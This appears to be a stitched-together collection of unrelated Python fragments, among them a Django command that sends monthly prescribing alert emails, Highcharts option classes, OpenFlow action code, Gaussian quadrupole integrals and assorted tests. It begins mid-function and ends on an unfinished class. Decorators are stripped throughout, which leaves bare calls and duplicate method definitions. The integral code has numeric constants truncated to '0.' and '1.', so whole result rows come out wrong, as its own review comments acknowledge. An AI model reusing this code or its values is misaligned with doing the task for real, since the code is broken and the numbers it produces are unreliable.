        raise ValueError('Can not specify both machine name and server info')
    if pServerInfo is None and machine is not None:
        info = COSERVERINFO()
        info.pwszName = machine
        pServerInfo = byref(info)
    if interface is None:
        interface = IUnknown
    mqi = MULTI_QI()
    mqi.pIID = pointer(interface._iid_)
    _ole32.CoCreateInstanceEx(byref(clsid), None, clsctx, pServerInfo, 1, byref(mqi))
    return cast(mqi.pItf, POINTER(interface))
class Command(BaseCommand):
    """Management command that sends monthly org/search bookmark alert emails."""
    args = ''
    help = ' Send monthly emails based on bookmarks. With no arguments, sends\n an email to every user for each of their bookmarks, for the\n current month. With arguments, sends a test email to the specified\n user for the specified organisation.'
    def add_arguments(self, parser):
        """Register CLI options: recipient selection/exclusion files, test org
        codes (ccg/pcn/stp/practice), test search (name + url), and error cap."""
        parser.add_argument('--recipient-email', help='A single alert recipient to which the batch should be sent')
        parser.add_argument('--recipient-email-file', help='The subset of alert recipients to which the batch should be sent. One email per line.')
        parser.add_argument('--skip-email-file', help='The subset of alert recipients to which the batch should NOT be sent. One email per line.')
        parser.add_argument('--ccg', help='If specified, a CCG code for which a test alert should be sent to `recipient-email`')
        parser.add_argument('--pcn', help='If specified, a PCN code for which a test alert should be sent to `recipient-email`')
        parser.add_argument('--stp', help='If specified, an STP/ICB code for which a test alert should be sent to `recipient-email`')
        parser.add_argument('--practice', help='If specified, a Practice code for which a test alert should be sent to `recipient-email`')
        parser.add_argument('--search-name', help='If specified, a name (could be anything) for a test search alert about `url` which should be sent to `recipient-email`')
        parser.add_argument('--url', help='If specified, a URL for a test search alert with name `search-name` which should be sent to `recipient-email`')
        parser.add_argument('--max_errors', help='Max number of permitted errors before aborting the batch', default=3)
    def get_org_bookmarks(self, now_month, **options):
        """Return org bookmarks to alert this month.

        Base query: active users not already emailed a 'measures' message for
        ``now_month``, with at least one org (practice/pct/pcn/stp) set.
        A test recipient + org code yields a single synthetic bookmark.
        """
        query = ((Q(user__is_active=True) & (~ Q(user__emailmessage__tags__contains=['measures', now_month]))) & (((Q(practice__isnull=False) | Q(pct__isnull=False)) | Q(pcn__isnull=False)) | Q(stp__isnull=False)))
        if (options['recipient_email'] and (options['ccg'] or options['practice'] or options['pcn'] or options['stp'])):
            # Test mode: fabricate an unsaved user/bookmark — nothing hits the DB.
            dummy_user = User(email=options['recipient_email'], id='dummyid')
            dummy_user.profile = Profile(key='dummykey')
            bookmarks = [OrgBookmark(user=dummy_user, pct_id=options['ccg'], practice_id=options['practice'], pcn_id=options['pcn'], stp_id=options['stp'])]
            logger.info('Created a single test org bookmark')
        elif (options['recipient_email'] or options['recipient_email_file']):
            # Restrict the batch to an explicit recipient list.
            recipients = []
            if options['recipient_email_file']:
                with open(options['recipient_email_file'], 'r') as f:
                    recipients = [x.strip() for x in f]
            else:
                recipients = [options['recipient_email']]
            query = (query & Q(user__email__in=recipients))
            bookmarks = OrgBookmark.objects.filter(query)
            logger.info(('Found %s matching org bookmarks' % bookmarks.count()))
        else:
            bookmarks = OrgBookmark.objects.filter(query)
            if options['skip_email_file']:
                # Opt-out list: drop any bookmark whose user is in the file.
                with open(options['skip_email_file'], 'r') as f:
                    skip = [x.strip() for x in f]
                bookmarks = bookmarks.exclude(user__email__in=skip)
            logger.info(('Found %s matching org bookmarks' % bookmarks.count()))
        return bookmarks
    def get_search_bookmarks(self, now_month, **options):
        """Return search bookmarks to alert this month (mirrors get_org_bookmarks,
        keyed on the 'analyse' email tag; test mode uses --url/--search-name)."""
        query = (Q(user__is_active=True) & (~ Q(user__emailmessage__tags__contains=['analyse', now_month])))
        if (options['recipient_email'] and options['url']):
            dummy_user = User(email=options['recipient_email'], id='dummyid')
            dummy_user.profile = Profile(key='dummykey')
            bookmarks = [SearchBookmark(user=dummy_user, url=options['url'], name=options['search_name'])]
            logger.info('Created a single test search bookmark')
        elif (not options['recipient_email']):
            bookmarks = SearchBookmark.objects.filter(query)
            logger.info(('Found %s matching search bookmarks' % bookmarks.count()))
        else:
            query = (query & Q(user__email=options['recipient_email']))
            bookmarks = SearchBookmark.objects.filter(query)
            logger.info(('Found %s matching search bookmarks' % bookmarks.count()))
        return bookmarks
    def validate_options(self, **options):
        """Reject incoherent option combinations before any work is done."""
        if ((options['url'] or options['ccg'] or options['practice']) and (not options['recipient_email'])):
            raise CommandError('You must specify a test recipient email if you want to specify a test CCG, practice, or URL')
        if (options['url'] and (options['practice'] or options['ccg'])):
            raise CommandError('You must specify either a URL, or one of a ccg or a practice')
    def send_org_bookmark_email(self, org_bookmark, now_month, options):
        """Render and send one org alert; skips closed orgs, logs image errors."""
        # Resolve the org from the bookmark, falling back to the test options.
        if (org_bookmark.practice or options['practice']):
            org = (org_bookmark.practice or Practice.objects.get(pk=options['practice']))
        elif (org_bookmark.pct or options['ccg']):
            org = (org_bookmark.pct or PCT.objects.get(pk=options['ccg']))
        elif (org_bookmark.pcn or options['pcn']):
            org = (org_bookmark.pcn or PCN.objects.get(pk=options['pcn']))
        elif (org_bookmark.stp or options['stp']):
            org = (org_bookmark.stp or STP.objects.get(pk=options['stp']))
        else:
            assert False
        if getattr(org, 'close_date', None):
            logger.info('Skipping sending alert for closed org %s', org.pk)
            return
        stats = bookmark_utils.InterestingMeasureFinder(org).context_for_org_email()
        try:
            msg = bookmark_utils.make_org_email(org_bookmark, stats, tag=now_month)
            msg = EmailMessage.objects.create_from_message(msg)
            msg.send()
            logger.info(('Sent org bookmark alert to %s about %s' % (msg.to, org_bookmark.id)))
        except bookmark_utils.BadAlertImageError as e:
            # Chart-image generation failed: log and move on rather than abort.
            logger.exception(e)
    def send_search_bookmark_email(self, search_bookmark, now_month):
        """Render and send one search alert; logs image errors and continues."""
        try:
            recipient_id = search_bookmark.user.id
            msg = bookmark_utils.make_search_email(search_bookmark, tag=now_month)
            msg = EmailMessage.objects.create_from_message(msg)
            msg.send()
            logger.info(('Sent search bookmark alert to %s about %s' % (recipient_id, search_bookmark.id)))
        except bookmark_utils.BadAlertImageError as e:
            logger.exception(e)
    def send_all_england_alerts(self, options):
        """Send All-England alerts only when no filtering options were given."""
        set_options = {k: v for (k, v) in options.items() if (v is not None)}
        # Strip framework/bookkeeping options before deciding whether any
        # user-supplied filter remains.
        for key in ['pythonpath', 'verbosity', 'traceback', 'settings', 'no_color', 'force_color', 'max_errors', 'skip_checks']:
            set_options.pop(key, None)
        recipient_email = set_options.pop('recipient_email', None)
        if (not set_options):
            message = 'Sending All England alerts'
            logger.info(message)
            print(message)
            send_all_england_alerts(recipient_email)
        else:
            message = 'Not sending All England alerts as found unhandled option: {}'.format(', '.join(set_options.keys()))
            logger.info(message)
            print(message)
    def handle(self, *args, **options):
        """Entry point: validate, pick the month tag, send all alert types.

        EmailErrorDeferrer tolerates up to --max_errors failures per batch.
        """
        self.validate_options(**options)
        now_month = ImportLog.objects.latest_in_category('prescribing').current_at.strftime('%Y-%m-%d').lower()
        self.send_all_england_alerts(options)
        with EmailErrorDeferrer(int(options['max_errors'])) as error_deferrer:
            for org_bookmark in self.get_org_bookmarks(now_month, **options):
                error_deferrer.try_email(self.send_org_bookmark_email, org_bookmark, now_month, options)
            for search_bookmark in self.get_search_bookmarks(now_month, **options):
                error_deferrer.try_email(self.send_search_bookmark_email, search_bookmark, now_month)
class OptionPlotoptionsArearangeSonificationDefaultspeechoptionsMappingTime(Options):
    """Highcharts sonification time-mapping options (auto-generated).

    NOTE(review): same-named getter/setter pairs — originals were presumably
    ``@property`` / setter pairs with decorators stripped. Kept byte-identical.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
_exception
def vm_node_overlays_sync(sender, vm=None, old_json_active=None, **kwargs):
    """Trigger an overlay sync on the VM's node if any of its NICs use overlays.

    Collects NICs from the active JSON (and the previous active JSON, if
    given), maps them to overlay rules, and forwards to node_overlays_sync.
    Returns None (no-op) when the VM has no overlay-backed NICs.
    """
    assert vm
    vm_nics = vm.json_active_get_nics()
    if old_json_active:
        vm_nics += vm.get_nics(old_json_active)
    # BUG FIX: the original wrapped this in filter(), whose lazy iterator is
    # ALWAYS truthy, so the empty-check below could never fire. Materialize
    # into a set (also deduplicates, as the original set literal intended).
    vm_overlay_rules = {rule for rule in (_is_vm_nic_over_overlay(vm_nic) for vm_nic in vm_nics) if rule}
    if not vm_overlay_rules:
        logger.debug('Skipping node overlay sync signaled by "%s" because VM %s does not have nics on overlays', sender, vm)
        return
    return node_overlays_sync(sender, node=vm.node, overlay_rules=vm_overlay_rules, **kwargs)
('foremast.utils.subnets.gate_request')
def test_utils_subnets_get_subnets_subnet_not_found(mock_gate_request):
    """get_subnets raises SpinnakerSubnetError for a region absent from the data."""
    mock_gate_request.return_value.json.return_value = SUBNET_DATA
    # BUG FIX: the original bound `result` inside the pytest.raises block and
    # then asserted on it afterwards — but the call raises before assignment,
    # so that trailing assert could only ever fail with NameError. The raise
    # itself is the behavior under test.
    with pytest.raises(SpinnakerSubnetError):
        get_subnets(env='dev', region='us-west-1')
(scope='function')
def iter_block_number(start=0):
    """Return a primed generator that yields a settable block number.

    ``next(gen)`` repeats the current value; ``gen.send(n)`` updates the value
    to ``n`` and yields it. The generator is advanced once before being
    returned so ``send()`` works immediately.
    """
    def _counter():
        current = start
        while True:
            received = yield current
            if received is not None:
                current = received
    gen = _counter()
    next(gen)  # prime to the first yield
    return gen
_action('test_service', 'test_action_2', body={'major': 'response'})
((__name__ + '._test_function'), return_value=42)
class TestStubActionAsStubAndPatchDecoratedClassUnitTestCase(UnitTestServerTestCase):
    """Verifies stacking of stub_action and mock.patch decorators on a TestCase.

    NOTE(review): the bare ``_action(...)`` calls here and just above the class
    look like stripped decorators (class-level stub + randint patch, plus a
    per-method stub) — the injected ``mock_randint`` / ``stub_*`` parameters
    confirm that reading.
    """
    server_class = _TestServiceServer
    server_settings = {}
    def test_works_as_expected(self, mock_randint, stub_test_action_2):
        """Class-level stub and patch are both active and observable."""
        response = self.client.call_action('test_service', 'test_action_1')
        self.assertEqual({'value': 42}, response.body)
        response = self.client.call_action('test_service', 'test_action_2', {'minor': 'request'})
        self.assertEqual({'major': 'response'}, response.body)
        self.assertEqual(1, stub_test_action_2.call_count)
        self.assertEqual({'minor': 'request'}, stub_test_action_2.call_body)
        stub_test_action_2.assert_called_once_with({'minor': 'request'})
        mock_randint.assert_called_once_with(0, 99)
    _action('cow', 'moo', body={'eats': 'grass'})
    def test_works_with_yet_another_stub(self, stub_moo, mock_randint, stub_test_action_2):
        """A method-level stub composes with the class-level stub and patch."""
        response = self.client.call_action('test_service', 'test_action_1')
        self.assertEqual({'value': 42}, response.body)
        response = self.client.call_action('test_service', 'test_action_2', {'minor': 'request'})
        self.assertEqual({'major': 'response'}, response.body)
        response = self.client.call_action('cow', 'moo')
        self.assertEqual({'eats': 'grass'}, response.body)
        self.assertEqual(1, stub_test_action_2.call_count)
        self.assertEqual({'minor': 'request'}, stub_test_action_2.call_body)
        stub_test_action_2.assert_called_once_with({'minor': 'request'})
        self.assertEqual(1, stub_moo.call_count)
        self.assertEqual({}, stub_moo.call_body)
        stub_moo.assert_called_once_with({})
        mock_randint.assert_called_once_with(0, 99)
class OptionPlotoptionsBoxplotSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
    """Highcharts sonification tremolo-speed mapping options (auto-generated).

    NOTE(review): same-named getter/setter pairs — originals were presumably
    ``@property`` / setter pairs with decorators stripped. Kept byte-identical.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
class Message():
    """Helpers for always-on-top modal Qt message boxes.

    NOTE(review): the methods take no ``self``/``cls`` and are intended to be
    called on the class itself (likely stripped ``@staticmethod`` decorators).
    """
    def ok(title, message, icon):
        """Show a modal information box with a single OK button."""
        box = QtWidgets.QMessageBox()
        box.setWindowFlags(box.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)
        box.setIcon(icon)
        box.setModal(True)
        box.setText('<b>{0}</b><br><br>{1}'.format(title, message))
        box.setStandardButtons(QtWidgets.QMessageBox.Ok)
        box.exec_()
    def yes_no(title, message, icon):
        """Show a modal Yes/Cancel box; return the clicked button code."""
        box = QtWidgets.QMessageBox()
        box.setWindowFlags(box.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)
        box.setIcon(icon)
        box.setModal(True)
        box.setText(title)
        box.setInformativeText(message)
        box.setStandardButtons(QtWidgets.QMessageBox.Cancel | QtWidgets.QMessageBox.Yes)
        box.setDefaultButton(QtWidgets.QMessageBox.Cancel)
        return box.exec_()
class NodeLookup(object):
    """Maps routing-node names to their wire lists, with pickle/JSON5 loaders."""
    def __init__(self):
        self.nodes = {}
    def load_from_nodes(self, nodes):
        """Adopt an existing node-name -> wires mapping."""
        self.nodes = nodes
    def load_from_root_csv(self, nodes):
        """Populate from per-node JSON5 files, showing a progress bar."""
        import pyjson5 as json5
        import progressbar
        for node_file in progressbar.progressbar(nodes):
            with OpenSafeFile(node_file) as handle:
                node_wires = json5.load(handle)
            assert node_wires['node'] not in self.nodes
            self.nodes[node_wires['node']] = node_wires['wires']
    def load_from_file(self, fname):
        """Restore the mapping from a pickle file."""
        with OpenSafeFile(fname, 'rb') as handle:
            self.nodes = pickle.load(handle)
    def save_to_file(self, fname):
        """Persist the mapping to a pickle file."""
        with OpenSafeFile(fname, 'wb') as handle:
            pickle.dump(self.nodes, handle)
    def site_pin_node_to_wires(self, tile, node):
        """Yield wires of ``node`` inside ``tile``, with the tile prefix stripped.

        Yields nothing when ``node`` is None.
        """
        if node is None:
            return
        prefix = tile + '/'
        for wire in self.nodes[node]:
            name = wire['wire']
            if name.startswith(prefix):
                yield name[len(prefix):]
    def wires_for_tile(self, tile):
        """Yield every known wire inside ``tile``, prefix stripped."""
        prefix = tile + '/'
        for node_wires in self.nodes.values():
            for wire in node_wires:
                name = wire['wire']
                if name.startswith(prefix):
                    yield name[len(prefix):]
class PostgresBackend(BroadcastBackend):
    """Broadcast backend using PostgreSQL LISTEN/NOTIFY via asyncpg."""
    def __init__(self, url: str):
        self._url = url
    async def connect(self) -> None:
        """Open the connection and create the queue of incoming events."""
        self._conn = await asyncpg.connect(self._url)
        self._listen_queue: asyncio.Queue = asyncio.Queue()
    async def disconnect(self) -> None:
        await self._conn.close()
    async def subscribe(self, channel: str) -> None:
        await self._conn.add_listener(channel, self._listener)
    async def unsubscribe(self, channel: str) -> None:
        await self._conn.remove_listener(channel, self._listener)
    async def publish(self, channel: str, message: str) -> None:
        await self._conn.execute('SELECT pg_notify($1, $2);', channel, message)
    def _listener(self, *args: Any) -> None:
        # asyncpg invokes listeners as (connection, pid, channel, payload).
        _connection, _pid, channel, payload = args
        self._listen_queue.put_nowait(Event(channel=channel, message=payload))
    async def next_published(self) -> Event:
        """Wait for and return the next notification as an Event."""
        return await self._listen_queue.get()
_action_type(ofproto.OFPAT_SET_FIELD, ofproto.OFP_ACTION_SET_FIELD_SIZE)
class OFPActionSetField(OFPAction):
    """OpenFlow set-field action (OXM-encoded), supporting old and new APIs.

    New API: construct with a single ``key=value`` kwarg (OXM field name).
    Old API: construct with an ``OFPMatchField`` instance.
    NOTE(review): ``parser`` / ``from_jsondict`` take ``cls`` — presumably
    ``@classmethod``-decorated in the original, with decorators stripped.
    """
    def __init__(self, field=None, **kwargs):
        super(OFPActionSetField, self).__init__()
        if isinstance(field, OFPMatchField):
            # Old (deprecated) API: a pre-built match field object.
            assert (len(kwargs) == 0)
            self.field = field
        else:
            # New API: exactly one key=value pair naming the OXM field.
            assert (len(kwargs) == 1)
            key = list(kwargs.keys())[0]
            value = kwargs[key]
            assert isinstance(key, (str, six.text_type))
            assert (not isinstance(value, tuple))  # masks are not allowed here
            self.key = key
            self.value = value
    def parser(cls, buf, offset):
        """Decode an action from ``buf`` at ``offset`` (header + OXM TLV)."""
        (type_, len_) = struct.unpack_from(ofproto.OFP_ACTION_SET_FIELD_PACK_STR, buf, offset)
        (n, value, mask, _len) = ofproto.oxm_parse(buf, (offset + 4))
        (k, uv) = ofproto.oxm_to_user(n, value, mask)
        action = cls(**{k: uv})
        action.len = len_
        # Also populate the old-API field object for backward compatibility.
        action.field = OFPMatchField.parser(buf, (offset + 4))
        return action
    def serialize(self, buf, offset):
        """Encode into ``buf``: 4-byte header, OXM payload, pad to 8 bytes."""
        if self._composed_with_old_api():
            return self.serialize_old(buf, offset)
        (n, value, mask) = ofproto.oxm_from_user(self.key, self.value)
        len_ = ofproto.oxm_serialize(n, value, mask, buf, (offset + 4))
        self.len = utils.round_up((4 + len_), 8)
        msg_pack_into('!HH', buf, offset, self.type, self.len)
        pad_len = (self.len - (4 + len_))
        msg_pack_into(('%dx' % pad_len), buf, ((offset + 4) + len_))
    def serialize_old(self, buf, offset):
        """Encode via the deprecated OFPMatchField path."""
        len_ = (ofproto.OFP_ACTION_SET_FIELD_SIZE + self.field.oxm_len())
        self.len = utils.round_up(len_, 8)
        pad_len = (self.len - len_)
        msg_pack_into('!HH', buf, offset, self.type, self.len)
        self.field.serialize(buf, (offset + 4))
        offset += len_
        msg_pack_into(('%dx' % pad_len), buf, offset)
    def _composed_with_old_api(self):
        # New-API instances always set self.value in __init__.
        return (not hasattr(self, 'value'))
    def to_jsondict(self):
        return {self.__class__.__name__: {'field': ofproto.oxm_to_jsondict(self.key, self.value), 'len': self.len, 'type': self.type}}
    def from_jsondict(cls, dict_):
        (k, v) = ofproto.oxm_from_jsondict(dict_['field'])
        o = OFPActionSetField(**{k: v})
        # Round-trip through the wire format so len/field are populated.
        buf = bytearray()
        o.serialize(buf, 0)
        return OFPActionSetField.parser(six.binary_type(buf), 0)
    def __str__(self):
        if self._composed_with_old_api():
            # Convert old-API state to new-API form for a uniform string.
            o2 = OFPActionSetField(self.field)
            buf = bytearray()
            o2.serialize(buf, 0)
            o = OFPActionSetField.parser(six.binary_type(buf), 0)
        else:
            o = self
        return super(OFPActionSetField, o).__str__()
    __repr__ = __str__
    def stringify_attrs(self):
        (yield (self.key, self.value))
class OptionSeriesItemSonificationDefaultinstrumentoptionsMappingFrequency(Options):
    """Highcharts sonification frequency-mapping options (auto-generated).

    NOTE(review): same-named getter/setter pairs — originals were presumably
    ``@property`` / setter pairs with decorators stripped. Kept byte-identical.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
def diag_quadrupole3d_40(ax, da, A, bx, db, B, R):
    """Diagonal quadrupole-moment integrals between a 4th-order shell at A
    and an s shell at B, with quadrupole reference point R.

    Machine-generated common-subexpression code: ``ax``/``bx`` are the
    exponents, ``da``/``db`` the contraction coefficients, ``A``/``B`` the
    centers.  Returns a (3, 15, 1) array — 3 diagonal quadrupole components
    by 15 Cartesian components of the order-4 shell.

    NOTE(review): several literal coefficients appear truncated at the
    decimal point (e.g. ``x28 = (0. * x27)`` zeroes entire result rows, and
    ``x6 = (1. * ...)``, ``x31 = (3. * x1)``, ``x48 = 1.``) — presumably
    the fractional digits were lost in extraction; verify these constants
    against the code generator's original output before trusting results.
    """
    result = numpy.zeros((3, 15, 1), dtype=float)
    # Gaussian product quantities: 1/(2p), 1/p, center of charge, overlap factor.
    x0 = (0.5 / (ax + bx))
    x1 = ((ax + bx) ** (- 1.0))
    x2 = ((- x1) * ((ax * A[0]) + (bx * B[0])))
    x3 = ((- x2) - A[0])
    x4 = ((ax * bx) * x1)
    x5 = numpy.exp(((- x4) * ((A[0] - B[0]) ** 2)))
    x6 = (1. * numpy.sqrt(x1))
    x7 = (x5 * x6)
    x8 = ((x3 ** 2) * x7)
    x9 = (x0 * x7)
    x10 = (3.0 * x9)
    x11 = (2.0 * x3)
    x12 = ((- x2) - R[0])
    x13 = (x12 * x7)
    x14 = (x10 + (x11 * x13))
    x15 = (2.0 * x0)
    x16 = (x3 * x7)
    x17 = (x0 * (x13 + x16))
    x18 = ((x12 * x16) + x9)
    x19 = (x18 * x3)
    x20 = ((x12 ** 2) * x7)
    x21 = (x0 * (x14 + x20))
    x22 = (x12 * x18)
    x23 = (x17 + x22)
    x24 = (x23 * x3)
    x25 = (x21 + x24)
    x26 = (((2.0 * x0) * (((2.0 * x17) + x19) + x22)) + (x25 * x3))
    x27 = (da * db)
    x28 = (0. * x27)
    # y- and z-direction Gaussian overlap exponentials.
    x29 = numpy.exp(((- x4) * ((A[1] - B[1]) ** 2)))
    x30 = numpy.exp(((- x4) * ((A[2] - B[2]) ** 2)))
    x31 = ((3. * x1) * x30)
    x32 = (x29 * x31)
    x33 = ((- x1) * ((ax * A[1]) + (bx * B[1])))
    x34 = ((- x33) - A[1])
    x35 = (0. * x27)
    x36 = (x34 * x35)
    x37 = (x26 * x32)
    x38 = ((- x1) * ((ax * A[2]) + (bx * B[2])))
    x39 = ((- x38) - A[2])
    x40 = (x35 * x39)
    x41 = (x30 * x6)
    x42 = (x29 * x6)
    x43 = ((x34 ** 2) * x42)
    x44 = (x0 * x42)
    x45 = (x43 + x44)
    x46 = (0. * x27)
    x47 = (x45 * x46)
    x48 = 1.
    x49 = ((x39 * x46) * x48)
    x50 = ((x39 ** 2) * x41)
    x51 = (x0 * x41)
    x52 = (x50 + x51)
    x53 = (x46 * x52)
    x54 = (x34 * x42)
    x55 = ((x15 * x54) + (x34 * x45))
    x56 = (x23 * x35)
    x57 = (x39 * x41)
    x58 = (x23 * x48)
    x59 = ((x15 * x57) + (x39 * x52))
    x60 = (3.0 * x44)
    x61 = ((x0 * ((3.0 * x43) + x60)) + (x34 * x55))
    x62 = (x20 + x9)
    x63 = (x28 * x62)
    x64 = (x35 * x62)
    x65 = (3.0 * x51)
    x66 = ((x0 * ((3.0 * x50) + x65)) + (x39 * x59))
    x67 = (x8 + x9)
    x68 = ((x15 * x16) + (x3 * x67))
    x69 = ((x0 * (x10 + (3.0 * x8))) + (x3 * x68))
    x70 = ((- x33) - R[1])
    x71 = (x42 * (x70 ** 2))
    x72 = (x44 + x71)
    x73 = (x28 * x72)
    x74 = (x42 * x70)
    x75 = (x0 * (x54 + x74))
    x76 = (x44 + (x54 * x70))
    x77 = (x70 * x76)
    x78 = (x75 + x77)
    x79 = (x35 * x78)
    x80 = (x35 * x72)
    x81 = (2.0 * x34)
    x82 = (x60 + (x74 * x81))
    x83 = (x0 * (x71 + x82))
    x84 = (x34 * x78)
    x85 = (x83 + x84)
    x86 = (x46 * x67)
    x87 = (x48 * x78)
    x88 = (x34 * x76)
    x89 = (((2.0 * x0) * (((2.0 * x75) + x77) + x88)) + (x34 * x85))
    x90 = (x31 * x89)
    x91 = (x3 * x5)
    x92 = (x35 * x91)
    x93 = (x28 * x5)
    x94 = ((- x38) - R[2])
    x95 = (x41 * (x94 ** 2))
    x96 = (x51 + x95)
    x97 = (x28 * x96)
    x98 = (x35 * x96)
    x99 = (x41 * x94)
    x100 = (x0 * (x57 + x99))
    x101 = (x51 + (x57 * x94))
    x102 = (x101 * x94)
    x103 = (x100 + x102)
    x104 = (x103 * x35)
    x105 = (x103 * x48)
    x106 = (2.0 * x39)
    x107 = ((x106 * x99) + x65)
    x108 = (x0 * (x107 + x95))
    x109 = (x103 * x39)
    x110 = (x108 + x109)
    x111 = ((3. * x1) * x29)
    x112 = (x101 * x39)
    x113 = (((2.0 * x0) * (((2.0 * x100) + x102) + x112)) + (x110 * x39))
    x114 = (x111 * x113)
    # Assemble the (component, angular function) entries.
    result[(0, 0, 0)] = numpy.sum(((x28 * x32) * ((x0 * ((((x11 * (x17 + x19)) + (x15 * (x14 + x8))) + (3.0 * x21)) + (3.0 * x24))) + (x26 * x3))))
    result[(0, 1, 0)] = numpy.sum((x36 * x37))
    result[(0, 2, 0)] = numpy.sum((x37 * x40))
    result[(0, 3, 0)] = numpy.sum(((x25 * x41) * x47))
    result[(0, 4, 0)] = numpy.sum((((x25 * x32) * x34) * x49))
    result[(0, 5, 0)] = numpy.sum(((x25 * x42) * x53))
    result[(0, 6, 0)] = numpy.sum(((x41 * x55) * x56))
    result[(0, 7, 0)] = numpy.sum(((x47 * x57) * x58))
    result[(0, 8, 0)] = numpy.sum(((x53 * x54) * x58))
    result[(0, 9, 0)] = numpy.sum(((x42 * x56) * x59))
    result[(0, 10, 0)] = numpy.sum(((x41 * x61) * x63))
    result[(0, 11, 0)] = numpy.sum(((x55 * x57) * x64))
    result[(0, 12, 0)] = numpy.sum(((x45 * x53) * x62))
    result[(0, 13, 0)] = numpy.sum(((x54 * x59) * x64))
    result[(0, 14, 0)] = numpy.sum(((x42 * x63) * x66))
    result[(1, 0, 0)] = numpy.sum(((x41 * x69) * x73))
    result[(1, 1, 0)] = numpy.sum(((x41 * x68) * x79))
    result[(1, 2, 0)] = numpy.sum(((x57 * x68) * x80))
    result[(1, 3, 0)] = numpy.sum(((x41 * x85) * x86))
    result[(1, 4, 0)] = numpy.sum(((x57 * x86) * x87))
    result[(1, 5, 0)] = numpy.sum(((x53 * x67) * x72))
    result[(1, 6, 0)] = numpy.sum((x90 * x92))
    result[(1, 7, 0)] = numpy.sum((((x31 * x49) * x85) * x91))
    result[(1, 8, 0)] = numpy.sum(((x16 * x53) * x87))
    result[(1, 9, 0)] = numpy.sum(((x16 * x59) * x80))
    result[(1, 10, 0)] = numpy.sum(((x31 * x93) * ((x0 * ((((x15 * (x43 + x82)) + (x81 * (x75 + x88))) + (3.0 * x83)) + (3.0 * x84))) + (x34 * x89))))
    result[(1, 11, 0)] = numpy.sum(((x40 * x5) * x90))
    result[(1, 12, 0)] = numpy.sum(((x53 * x7) * x85))
    result[(1, 13, 0)] = numpy.sum(((x59 * x7) * x79))
    result[(1, 14, 0)] = numpy.sum(((x66 * x7) * x73))
    result[(2, 0, 0)] = numpy.sum(((x42 * x69) * x97))
    result[(2, 1, 0)] = numpy.sum(((x54 * x68) * x98))
    result[(2, 2, 0)] = numpy.sum(((x104 * x42) * x68))
    result[(2, 3, 0)] = numpy.sum(((x47 * x67) * x96))
    result[(2, 4, 0)] = numpy.sum(((x105 * x54) * x86))
    result[(2, 5, 0)] = numpy.sum(((x110 * x42) * x86))
    result[(2, 6, 0)] = numpy.sum(((x16 * x55) * x98))
    result[(2, 7, 0)] = numpy.sum(((x105 * x16) * x47))
    result[(2, 8, 0)] = numpy.sum((((((x110 * x111) * x34) * x46) * x48) * x91))
    result[(2, 9, 0)] = numpy.sum((x114 * x92))
    result[(2, 10, 0)] = numpy.sum(((x61 * x7) * x97))
    result[(2, 11, 0)] = numpy.sum(((x104 * x55) * x7))
    result[(2, 12, 0)] = numpy.sum(((x110 * x47) * x7))
    result[(2, 13, 0)] = numpy.sum(((x114 * x36) * x5))
    result[(2, 14, 0)] = numpy.sum(((x111 * x93) * ((x0 * ((((x106 * (x100 + x112)) + (3.0 * x108)) + (3.0 * x109)) + (x15 * (x107 + x50)))) + (x113 * x39))))
    return result
def _cmd_antitarget(args):
    """Derive antitarget ("off-target") bins from the target regions.

    Reads the target regions (and optionally an accessible-regions file),
    computes antitarget bins, and writes them as BED4.  When no output path
    is given, one is derived from the targets filename.
    """
    targets = tabio.read_auto(args.targets)
    access = tabio.read_auto(args.access) if args.access else None
    out_arr = antitarget.do_antitarget(targets, access, args.avg_size, args.min_size)
    if not args.output:
        # Derive a default output name from the targets file.  The original
        # read ``args.interval`` here while every other line uses
        # ``args.targets`` — evidently a stale attribute from an argument
        # rename, which would raise AttributeError when --output is omitted.
        base, ext = args.targets.rsplit('.', 1)
        args.output = base + '.antitarget.' + ext
    tabio.write(out_arr, args.output, 'bed4')
def build_d2go_model(cfg: CfgNode) -> D2GoModelBuildResult:
    """Build the meta-architecture described by *cfg* and apply any
    configured modeling hooks.

    Returns a D2GoModelBuildResult holding the (possibly wrapped) model and
    the list of hooks that were applied (empty when none are configured).
    """
    model = build_meta_arch(cfg)
    applied_hooks: List[mh.ModelingHook] = []
    if hasattr(cfg.MODEL, 'MODELING_HOOKS'):
        names = cfg.MODEL.MODELING_HOOKS
        model, applied_hooks = mh.build_and_apply_modeling_hooks(model, cfg, names)
    return D2GoModelBuildResult(model=model, modeling_hooks=applied_hooks)
def get_bucket():
    """Return the configured public S3 bucket.

    Returns None (after logging) when the connection cannot be set up,
    e.g. when running locally without AWS credentials.
    """
    try:
        s3 = boto3.Session().resource('s3')
        bucket_name = env.get_credential('AWS_PUBLIC_BUCKET')
        bucket = s3.Bucket(bucket_name)
    except Exception as err:
        # Best-effort: a missing bucket is tolerated in local development.
        logging.error('An error occurred trying to connect to s3. Please disregard if running locally.{0}'.format(err))
        return None
    return bucket
class BaseBenchmark(abc.ABC):
def __init__(self, job_control: proto_control.JobControl, benchmark_name: str) -> None:
    """Initialize the benchmark from its job control document.

    Args:
        job_control: the control proto driving this benchmark run.
